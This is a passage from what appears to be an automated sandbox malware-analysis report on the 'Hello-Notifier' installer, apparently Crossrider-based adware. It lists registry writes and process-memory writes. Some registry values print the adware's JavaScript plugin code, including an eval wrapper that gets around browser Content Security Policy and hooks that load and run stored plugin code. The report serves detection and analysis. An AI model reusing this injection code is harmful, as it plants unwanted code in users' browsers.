TLDs=[\"ac\",\"ad\",\"ae\",\"aero\",\"af\",\"ag\",\"ai\",\"al\",\"am\",\"an\",\"ao\",\"aq\",\"ar\",\"arpa\",\"as\",\"asia\",\"at\",\"au\",\"aw\",\"ax\",\"az\",\"ba\",\"bb\",\"bd\",\"be\",\"bf\",\"bg\",\"bh\",\"bi\",\"biz\",\"bj\",\"bm\",\"bn\",\"bo\",\"br\",\"bs\",\"bt\",\"bv\",\"bw\",\"by\",\"bz\",\"ca\",\"cat\",\"cc\",\"cd\",\"cf\",\"cg\",\"ch\",\"ci\",\"ck\",\"cl\",\"cm\",\"cn\",\"co\",\"com\",\"coop\",\"cr\",\"cu\",\"cv\",\"cx\",\"cy\",\"cz\",\"de\",\"dj\",\"dk\",\"dm\",\"do\",\"dz\",\"ec\",\"edu\",\"ee\",\"eg\",\"er\",\"es\",\"et\",\"eu\",\"fi\",\"fj\",\"fk\",\"fm\",\"fo\",\"fr\",\"ga\",\"gb\",\"gd\",\"ge\",\"gf\",\"gg\",\"gh\",\"gi\",\"gl\",\"gm\",\"gn\",\"gov\",\"gp\",\"gq\",\"gr\",\"gs\",\"gt\",\"gu\",\"gw\",\"gy\",\"hk\",\"hm\",\"hn\",\"hr\",\"ht\",\"hu\",\"id\",\"ie\",\"il\",\"im\",\"in\",\"info\",\"int\",\"io\",\"iq\",\"ir\",\"is\",\"it\",\"je\",\"jm\",\"jo\",\"jobs\",\"jp\",\"ke\",\"kg\",\"kh\",\"ki\",\"km\",\"kn\",\"kp\",\"kr\",\"kw\",\"ky\",\"kz\",\"la\",\"lb\",\"lc\",\"li\",\"lk\",\"lr\",\"ls\",\"lt\",\"lu\",\"lv\",\"ly\",\"ma\",\"mc\",\"md\",\"me\",\"mg\",\"mh\",\"mil\",\"mk\",\"ml\",\"mm\",\"mn\",\"mo\",\"mobi\",\"mp\",\"mq\",\"mr\",\"ms\",\"mt\",\"mu\",\"museum\",\"mv\",\"mw\",\"mx\",\"my\",\"mz\",\"na\",\"name\",\"nc\",\"ne\",\"net\",\"nf\",\"ng\",\"ni\",\"nl\",\"no\",\"np\",\"nr\",\"nu\",\"nz\",\"om\",\"org\",\"pa\",\"pe\",\"pf\",\"pg\",\"ph\",\"pk\",\"pl\",\"pm\",\"pn\",\"pr\",\"pro\",\"ps\",\"pt\",\"pw\",\"py\",\"qa\",\"re\",\"ro\",\"rs\",\"ru\",\"rw\",\"sa\",\"sb\",\"sc\",\"sd\",\"se\",\"sg\",\"sh\",\"si\",\"sj\",\"sk\",\"sl\",\"sm\",\"sn\",\"so\",\"sr\",\"st\",\"su\",\"sv\",\"sy\",\"sz\",\"tc\",\"td\",\"tel\",\"tf\",\"tg\",\"th\",\"tj\",\"tk\",\"tl\",\"tm\",\"tn\",\"to\",\"tp\",\"tr\",\"travel\",\"tt\",\"tv\",\"tw\",\"tz\",\"ua\",\"ug\",\"uk\",\"us\",\"uy\",\"uz\",\"va\",\"vc\",\"ve\",\"vg\",\"vi\",\"vn\",\"vu\",\"wf\",\"ws\",\"xn--0zwm56d\",\"xn--11b5bs3a9aj6g\",\"xn--3e0b707e\",\"xn--45brj9c\",\"xn--80akhbyknj4f\",\"xn--90a3ac\",\"xn--9t4b11yi5a\",\"xn--clchc0ea0b2g2a9gcd\",\"xn--deba0ad\",\"xn--fiqs8s\",\"xn--fiqz9s\",\"xn--fpcrj9c3d\",\"xn--fzc2c9e2c\",\"xn--g6w251d\",\"xn--gecrj9c\",\"xn--h2brj9c\",\"xn--hgbk6aj7f53bba\",\"xn--hlcj6aya9esc7a\",\"xn--j6w193g\",\"xn--jxalpdlp\",\"xn--kgbechtv\",\"xn--kprw13d\",\"xn--kpry57d\",\"xn--lgbbat1ad8j\",\"xn--mgbaam7a8h\",\"xn--mgbayh7gpa\",\"xn--mgbbh1a71e\",\"xn--mgbc0a9azcg\",\"xn--mgberp4a5d4ar\",\"xn--o3cw4h\",\"xn--ogbpf8fl\",\"xn--p1ai\",\"xn--pgbs0dh\",\"xn--s9brj9c\",\"xn--wgbh1c\",\"xn--wgbl6a\",\"xn--xkc2al3hye2a\",\"xn--xkc2dl3a5ee0h\",\"xn--yfro4i67o\",\"xn--ygbi2ammx\",\"xn--zckzah\",\"xxx\",\"ye\",\"yt\",\"za\",\"zm\",\"zw\"].join();return function(url){var parts,part,tldLevelsChecked;host=appAPI.utils.getHost(url);parts=host.split(\".\");if(parts[0]===\"www\"&&parts[1]!==\"com\"){parts.shift();}while(parts.length>0){part=parts.pop();tldLevelsChecked++;if(tldLevelsChecked>2||appAPI.utils.indexOf(TLDs,part)<0){break;}}return part;};}());appAPI.utils.newFunction=function(code){try{return new Function(code);}catch(e){if(appAPI.platform==\"FF\"&&e.message.indexOf(\"blocked by CSP\")>-1&&FFInternal&&typeof FFInternal.newFunction===\"function\"){return FFInternal.newFunction(code);}}};appAPI.utils.eval=eval;if(appAPI.platform===\"FF\"){try{eval(\"var testEval = true;\");}catch(e){appAPI.utils.eval=function(code,scope){if(e.message.indexOf(\"blocked by CSP\")>-1&&FFInternal&&typeof FFInternal.newFunction===\"function\"){var foo=FFInternal.newFunction(code);if(scope){foo.call(scope);return;}foo();}};}}appAPI.utils.trim=function(str){if(!appAPI.utils.isString(str)){return str;}if(typeof str.trim===\"function\"){return str.trim();}else{return str.replace(/^\\s+|\\s+$/g,\"\");}};}());(function(){appAPI.utils.Base64={_keyStr:\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\",encode:function(c){var a=\"\";var k,h,f,j,g,e,d;var b=0;c=appAPI.utils.Base64._utf8_encode(c);while(b<c.length){k=c.charCodeAt(b++);h=c.charCodeAt(b++);f=c.charCodeAt(b++);j=k>>2;g=((k&3)<<4)|(h>>4);e=((h&15)<<2)|(f>>6);d=f&63;if(isNaN(h)){e=d=64;}else{if(isNaN(f)){d=64;}}a=a+this._keyStr.charAt(j)+this._keyStr.charAt(g)+this._keyStr.charAt(e)+this._keyStr.charAt(d);}return a;},decode:function(c){var a=\"\";var k,h,f;var j,g,e,d;var b=0;c=c.replace(/[^A-Za-z0-9\\+\\/\\=]/g,\"\");while(b<c.length){j=this._keyStr.indexOf(c.charAt(b++));g=this._keyStr.indexOf(c.charAt(b++));e=this._keyStr.indexOf(c.charAt(b++));d=this._keyStr.indexOf(c.charAt(b++));k=(j<<2)|(g>>4);h=((g&15)<<4)|(e>>2);f=((e&3)<<6)|d;a=a+String.fromCharCode(k);if(e!=64){a=a+String.fromCharCode(h);}if(d!=64){a=a+String.fromCharCode(f);}}a=appAPI.utils.Base64._utf8_decode(a);return a;},_utf8_encode:function(b){b=b.replace(/\\r\\n/g,\"\\n\");var a=\"\";for(var e=0;e<b.length;e++){var d=b.charCodeAt(e);if(d<128){a+=String.fromCharCode(d);}else{if((d>127)&&(d<2048)){a+=String.fromCharCode((d>>6)|192);a+=String.fromCharCode((d&63)|128);}else{a+=String.fromCharCode((d>>12)|224);a+=String.fromCharCode(((d>>6)&63)|128);a+=String.fromCharCode((d&63)|128);}}}return a;},_utf8_decode:function(a){var b=\"\";var d=0;var e=c1=c2=0;while(d<a.length){e=a.charCodeAt(d);if(e<128){b+=String.fromCharCode(e);d++;}else{if((e>191)&&(e<224)){c2=a.charCodeAt(d+1);b+=String.fromCharCode(((e&31)<<6)|(c2&63));d+=2;}else{c2=a.charCodeAt(d+1);c3=a.charCodeAt(d+2);b+=String.fromCharCode(((e&15)<<12)|((c2&63)<<6)|(c3&63));d+=3;}}}return b;}};})();(function(){function a(b){if(appAPI[b]){return appAPI[b];}return function(){var c=Array.prototype.slice.call(arguments,0);return window[b].apply(window,c);};}appAPI.setTimeout=a(\"setTimeout\");appAPI.setInterval=a(\"setInterval\");appAPI.clearTimeout=a(\"clearTimeout\");appAPI.clearInterval=a(\"clearInterval\");}());(function(){appAPI.utils.MD5=(function(){var q=0;var y=\"\";function p(B){return z(n(r(B)));}function o(B){return b(n(r(B)));}function i(B,C){return e(n(r(B)),C);}function w(B,C){return z(g(r(B),r(C)));}function l(B,C){return b(g(r(B),r(C)));}function h(B,D,C){return e(g(r(B),r(D)),C);}function A(){return p(\"abc\").toLowerCase()==\"900150983cd24fb0d6963f7d28e17f72\";}function n(B){return u(f(m(B),B.length*8));}function g(D,G){var F=m(D);if(F.length>16){F=f(F,D.length*8);}var B=Array(16),E=Array(16);for(var C=0;C<16;C++){B[C]=F[C]^909522486;E[C]=F[C]^1549556828;}var H=f(B.concat(m(G)),512+G.length*8);return u(f(E.concat(H),512+128));}function z(D){if(typeof q===\"undefined\"){q=0;}var F=q?\"0123456789ABCDEF\":\"0123456789abcdef\";var C=\"\";var B;for(var E=0;E<D.length;E++){B=D.charCodeAt(E);C+=F.charAt((B>>>4)&15)+F.charAt(B&15);}return C;}function b(D){if(typeof y===\"undefined\"){y=\"\";}var G=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";var C=\"\";var B=D.length;for(var F=0;F<B;F+=3){var H=(D.charCodeAt(F)<<16)|(F+1<B?D.charCodeAt(F+1)<<8:0)|(F+2<B?D.charCodeAt(F+2):0);for(var E=0;E<4;E++){if(F*8+E*6>D.length*8){C+=y;}else{C+=G.charAt((H>>>6*(3-E))&63);}}}return C;}function e(L,D){var C=D.length;var K,G,B,M,F;var J=Array(Math.ceil(L.length/2));for(K=0;K<J.length;K++){J[K]=(L.charCodeAt(K*2)<<8)|L.charCodeAt(K*2+1);}var I=Math.ceil(L.length*8/(Math.log(D.length)/Math.log(2)));var H=Array(I);for(G=0;G<I;G++){F=Array();M=0;for(K=0;K<J.length;K++){M=(M<<16)+J[K];B=Math.floor(M/C);M-=B*C;if(F.length>0||B>0){F[F.length]=B;}}H[G]=M;J=F;}var E=\"\";for(K=H.length-1;K>=0;K--){E+=D.charAt(H[K]);}return E;}function r(D){var C=\"\";var E=-1;var B,F;while(++E<D.length){B=D.charCodeAt(E);F=E+1<D.length?D.charCodeAt(E+1):0;if(55296<=B&&B<=56319&&56320<=F&&F<=57343){B=65536+((B&1023)<<10)+(F&1023);E++;}if(B<=127){C+=String.fromCharCode(B);}else{if(B<=2047){C+=String.fromCharCode(192|((B>>>6)&31),128|(B&63));}else{if(B<=65535){C+=String.fromCharCode(224|((B>>>12)&15),128|((B>>>6)&63),128|(B&63));}else{if(B<=2097151){C+=String.fromCharCode(240|((B>>>18)&7),128|((B>>>12)&63),128|((B>>>6)&63),128|(B&63));}}}}}return C;}function v(C){var B=\"\";for(var D=0;D<C.length;D++){B+=String.fromCharCode(C.charCodeAt(D)&255,(C.charCodeAt(D)>>>8)&255);}return B;}function k(C){var B=\"\";for(var D=0;D<C.length;D++){B+=String.fromCharCode((C.charCodeAt(D)>>>8)&255,C.charCodeAt(D)&255);}return B;}function m(C){var B=Array(C.length>>2);for(var D=0;D<B.length;D++){B[D]=0;}for(var D=0;D<C.length*8;D+=8){B[D>>5]|=(C.charCodeAt(D/8)&255)<<(D%32);}return B;}function u(C){var B=\"\";for(var D=0;D<C.length*32;D+=8){B+=String.fromCharCode((C[D>>5]>>>(D%32))&255);}return B;}function f(L,G){L[G>>5]|=128<<((G)%32);L[(((G+64)>>>9)<<4)+14]=G;var K=1732584193;var J=-271733879;var I=-1732584194;var H=271733878;for(var D=0;D<L.length;D+=16){var F=K;var E=J;var C=I;var B=H;K=c(K,J,I,H,L[D+0],7,-680876936);H=c(H,K,J,I,L[D+1],12,-389564586);I=c(I,H,K,J,L[D+2],17,606105819);J=c(J,I,H,K,L[D+3],22,-1044525330);K=c(K,J,I,H,L[D+4],7,-176418897);H=c(H,K,J,I,L[D+5],12,1200080426);I=c(I,H,K,J,L[D+6],17,-1473231341);J=c(J,I,H,K,L[D+7],22,-45705983);K=c(K,J,I,H,L[D+8],7,1770035416);H=c(H,K,J,I,L[D+9],12,-1958414417);I=c(I,H,K,J,L[D+10],17,-42063);J=c(J,I,H,K,L[D+11],22,-1990404162);K=c(K,J,I,H,L[D+12],7,1804603682);H=c(H,K,J,I,L[D+13],12,-40341101);I=c(I,H,K,J,L[D+14],17,-1502002290);J=c(J,I,H,K,L[D+15],22,1236535329);K=j(K,J,I,H,L[D+1],5,-165796510);H=j(H,K,J,I,L[D+6],9,-1069501632);I=j(I,H,K,J,L[D+11],14,643717713);J=j(J,I,H,K,L[D+0],20,-373897302);K=j(K,J,I,H,L[D+5],5,-701558691);H=j(H,K,J,I,L[D+10],9,38016083);I=j(I,H,K,J,L[D+15],14,-660478335);J=j(J,I,H,K,L[D+4],20,-405537848);K=j(K,J,I,H,L[D+9],5,568446438);H=j(H,K,J,I,L[D+14],9,-1019803690);I=j(I,H,K,J,L[D+3],14,-187363961);J=j(J,I,H,K,L[D+8],20,1163531501);K=j(K,J,I,H,L[D+13],5,-1444681467);H=j(H,K,J,I,L[D+2],9,-51403784);I=j(I,H,K,J,L[D+7],14,1735328473);J=j(J,I,H,K,L[D+12],20,-1926607734);K=t(K,J,I,H,L[D+5],4,-378558);H=t(H,K,J,I,L[D+8],11,-2022574463);I=t(I,H,K,J,L[D+11],16,1839030562);J=t(J,I,H,K,L[D+14],23,-35309556);K=t(K,J,I,H,L[D+1],4,-1530992060);H=t(H,K,J,I,L[D+4],11,1272893353);I=t(I,H,K,J,L[D+7],16,-155497632);J=t(J,I,H,K,L[D+10],23,-1094730640);K=t(K,J,I,H,L[D+13],4,681279174);H=t(H,K,J,I,L[D+0],11,-358537222);I=t(I,H,K,J,L[D+3],16,-722521979);J=t(J,I,H,K,L[D+6],23,76029189);K=t(K,J,I,H,L[D+9],4,-640364487);H=t(H,K,J,I,L[D+12],11,-421815835);I=t(I,H,K,J,L[D+15],16,530742520);J=t(J,I,H,K,L[D+2],23,-995338651);K=a(K,J,I,H,L[D+0],6,-198630844);H=a(H,K,J,I,L[D+7],10,1126891415);I=a(I,H,K,J,L[D+14],15,-1416354905);J=a(J,I,H,K,L[D+5],21,-57434055);K=a(K,J,I,H,L[D+12],6,1700485571);H=a(H,K,J,I,L[D+3],10,-1894986606);I=a(I,H,K,J,L[D+10],15,-1051523);J=a(J,I,H,K,L[D+1],21,-2054922799);K=a(K,J,I,H,L[D+8],6,1873313359);H=a(H,K,J,I,L[D+15],10,-30611744);I=a(I,H,K,J,L[D+6],15,-1560198380);J=a(J,I,H,K,L[D+13],21,1309151649);K=a(K,J,I,H,L[D+4],6,-145523070);H=a(H,K,J,I,L[D+11],10,-1120210379);I=a(I,H,K,J,L[D+2],15,718787259);J=a(J,I,H,K,L[D+9],21,-343485551);K=s(K,F);J=s(J,E);I=s(I,C);H=s(H,B);}return Array(K,J,I,H);}function d(G,D,C,B,F,E){return s(x(s(s(D,G),s(B,E)),F),C);}function c(D,C,H,G,B,F,E){return d((C&H)|((~C)&G),D,C,B,F,E);}function j(D,C,H,G,B,F,E){return d((C&G)|(H&(~G)),D,C,B,F,E);}function t(D,C,H,G,B,F,E){return d(C^H^G,D,C,B,F,E);}function a(D,C,H,G,B,F,E){return d(H^(C|(~G)),D,C,B,F,E);}function s(B,E){var D=(B&65535)+(E&65535);var C=(B>>16)+(E>>16)+(D>>16);return(C<<16)|(D&65535);}function x(B,C){return(B<<C)|(B>>>(32-C));}return{encode:p};}());}());\n//------------------ PLUGIN CrossriderUtils END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{66666666-6666-6666-6666-660366796628}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11111111-1111-1111-1111-110311791128}\Programmable C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\ModeType = "production" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\42\JavaScript = "\n//------------------ PLUGIN IEInternal START ------------------\nvar Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===\"undefined\"){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==\"undefined\"){window={};}if(typeof window.document===\"undefined\"){window.document={};document=window.document;}if(typeof window.alert===\"undefined\"){window.alert=function(b){var c;if(typeof b===\"undefined\"){c=\"undefined\";}else{if(b===null){c=\"null\";}else{c=b.toString();}}if(typeof c===\"string\"){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===\"undefined\"){window.console={};console=window.console;}if(typeof console.log===\"undefined\"){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===\"undefined\"){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===\"undefined\"){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===\"undefined\"){window.console.error=function(a){};console.error=window.console.error;}if(typeof console.assert===\"undefined\"){window.console.assert=function(a){};console.assert=window.console.assert;}if(typeof console.dir===\"undefined\"){window.console.dir=function(a){};console.dir=window.console.dir;}if(typeof console.clear===\"undefined\"){window.console.clear=function(a){};console.clear=window.console.clear;}if(typeof console.profile===\"undefined\"){window.console.profile=function(a){};console.profile=window.console.profile;}if(typeof console.profileEnd===\"undefined\"){window.console.profileEnd=function(a){};console.profileEnd=window.console.profileEnd;}(function($){if(typeof appAPI.internal===\"undefined\"){appAPI.internal={};}if(typeof appAPI.internal.prefs===\"undefined\"){appAPI.internal.prefs={};}appAPI.internal.prefs.getChar=function(key,section){var value=$.getPref(key,section);if(value===\"__CR_@FAILED_DOWNLOAD_READ@_CR__\"){return null;}return value;};appAPI.internal.prefs.getInt=function(key,section){return parseInt(appAPI.internal.prefs.getChar(key,section));};appAPI.internal.prefs.setInt=function(value,key,section){return $.setIntPref(value,key,section);};appAPI.internal.prefs.setChar=function(value,key,section){return $.setCharPref(value,key,section);};appAPI.internal.prefs.getChildValueNames=function(section){var commaSeperatedList=$.getChildValueNames(section);var valueNamesArray=commaSeperatedList.split(\",\");return valueNamesArray;};appAPI.internal.prefs.getChildKeys=function(section){if(typeof $.getChildKeys===\"undefined\"){return;}var commaSeperatedList=$.getChildKeys(section);var valueNamesArray=commaSeperatedList.split(\",\");return valueNamesArray;};if(typeof appAPI.internal.debug===\"undefined\"){appAPI.internal.debug={};}appAPI.internal.debug.getDebugUrl=function(){var appCodeUrl=appAPI.internal.prefs.getChar(\"DebuggedAppUrl\",\"Debug\");var bgCodeUrl=appAPI.internal.prefs.getChar(\"DebuggedBgUrl\",\"Debug\");var res={userCode:appCodeUrl,backgroundCode:bgCodeUrl};return res;};appAPI.internal.debug.isDebugMode=function(){return(appAPI.internal.prefs.getChar(\"IsDebugMode\",\"Debug\")==\"1\");};appAPI.internal.debug.turnOn=function(debugUrls){if(typeof debugUrls===\"undefined\"||debugUrls===null){return false;}if(typeof debugUrls.userCode!==\"string\"){return false;}if(typeof debugUrls.backgroundCode!==\"string\"){return false;}appAPI.internal.prefs.setInt(\"IsDebugMode\",1,\"Debug\");appAPI.internal.prefs.setChar(\"DebuggedAppUrl\",debugUrls.userCode,\"Debug\");appAPI.internal.prefs.setChar(\"DebuggedBgUrl\",debugUrls.backgroundCode,\"Debug\");if(typeof $.reloadBg!==\"undefined\"){$.reloadBg();}return true;};appAPI.internal.debug.turnOff=function(){$.setIntPref(\"IsDebugMode\",0,\"Debug\");};appAPI.internal.reloadBackground=function(){if(typeof $.reloadBg===\"undefined\"){return false;}$.reloadBg();return true;};appAPI.internal.console=function(text,level){msgToSend={text:text,level:level};appAPI.internal.message.send({eventName:\"externalConsole\",eventContent:msgToSend});};appAPI.internal.console.log=function(text){appAPI.internal.console(text,\"log\");};appAPI.internal.console.info=function(text){appAPI.internal.console(text,\"info\");};appAPI.internal.console.warn=function(text){appAPI.internal.console(text,\"warn\");};appAPI.internal.console.error=function(text){appAPI.internal.console(text,\"error\");};appAPI.internal.log=function(str){$.log(str);};appAPI.internal.forceUpdate=function(){$.forceUpdate();};appAPI.internal.globalEval=function(js){if(typeof $.eval===\"undefined\"){console.error(\"appAPI.internal.globalEval is not supported\");return false;}if(typeof js!==\"string\"){console.error(\"appAPI.internal.globalEval expected a string as the 1st parameter and got: \"+typeof js);return false;}$.eval(js);return true;};if(typeof $.isIframe!==\"undefined\"){if(typeof appAPI.dom===\"undefined\"){appAPI.dom={};}appAPI.dom.isIframe=function(){return $.isIframe();};}appAPI.internal.getIsAddressBarShowing=function(){if(typeof $.isAddressBarShowing!==\"undefined\"){return $.isAddressBarShowing();}return false;};appAPI.internal.userCode={};appAPI.internal.userCode.getExtension=function(callback){setTimeout(function(){callback(appAPI.internal.prefs.getChar(\"AppJavaScript\",\"Code\"));},10);};appAPI.internal.userCode.getBackground=function(callback){setTimeout(function(){callback(appAPI.internal.prefs.getChar(\"BgJavaScript\",\"Code\"));},10);};appAPI.internal.plugins={};appAPI.internal.plugins.getOrder=function(target,callback){if(target===0){target=\"BgPluginList\";}else{if(target===1){target=\"AppPluginList\";}else{if(target===5){target=\"PopupPluginList\";}else{return;}}}var pluginsListIds=appAPI.internal.prefs.getChar(target,\"Plugins\");if(pluginsListIds){pluginsListIds=pluginsListIds.split(\",\");}var pluginsList=[];for(i=0;i<pluginsListIds.length;i++){var name=appAPI.internal.prefs.getChar(\"Name\",\"Plugins\\\\\"+pluginsListIds[i]);var url=appAPI.internal.prefs.getChar(\"Url\",\"Plugins\\\\\"+pluginsListIds[i]);var ver=appAPI.internal.prefs.getInt(\"Version\",\"Plugins\\\\\"+pluginsListIds[i]);pluginsList.push({id:pluginsListIds[i],name:name,url:url,ver:ver});}setTimeout(function(){callback(pluginsList);},10);};appAPI.internal.plugins.getInfo=function(pluginId,callback){var name=appAPI.internal.prefs.getChar(\"Name\",\"Plugins\\\\\"+pluginId);var url=appAPI.internal.prefs.getChar(\"Url\",\"Plugins\\\\\"+pluginId);var ver=appAPI.internal.prefs.getInt(\"Version\",\"Plugins\\\\\"+pluginId);setTimeout(function(){callback({name:name,ver:ver,id:pluginId});},10);};appAPI.internal.plugins.getCode=function(plugin,callback){var code=appAPI.internal.prefs.getChar(\"JavaScript\",\"Plugins\\\\\"+plugin.id);setTimeout(function(){callback(code);},10);};})(appAPIinternal);\n//------------------ PLUGIN IEInternal END ------------------\n" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\4 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CrossriderApp0037928.BHO\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{11111111-1111-1111-1111-110311791128}\TypeLib\ = "{44444444-4444-4444-4444-440344794428}" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\OnRequestPluginList = "14,42,41,39,38,43,45,64,72" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\ActiveAppId = "37928" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Manifest\Name = "Hello-Notifier" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\102 C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\7\Version = "2" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\windows_ie_ac_001\Software\Hello-Notifier\Plugins\22\Name = "resources" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{44444444-4444-4444-4444-440344794428}\1.0\ = "CrossriderApp0037928 Type Library" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{22222222-2222-2222-2222-220322792228} C:\Windows\system32\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3768 wrote to memory of 3788 N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe
PID 3788 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 3788 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 3788 wrote to memory of 3848 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe
PID 3788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2376 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 2656 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe
PID 3788 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3788 wrote to memory of 4504 N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe C:\Windows\SysWOW64\regsvr32.exe
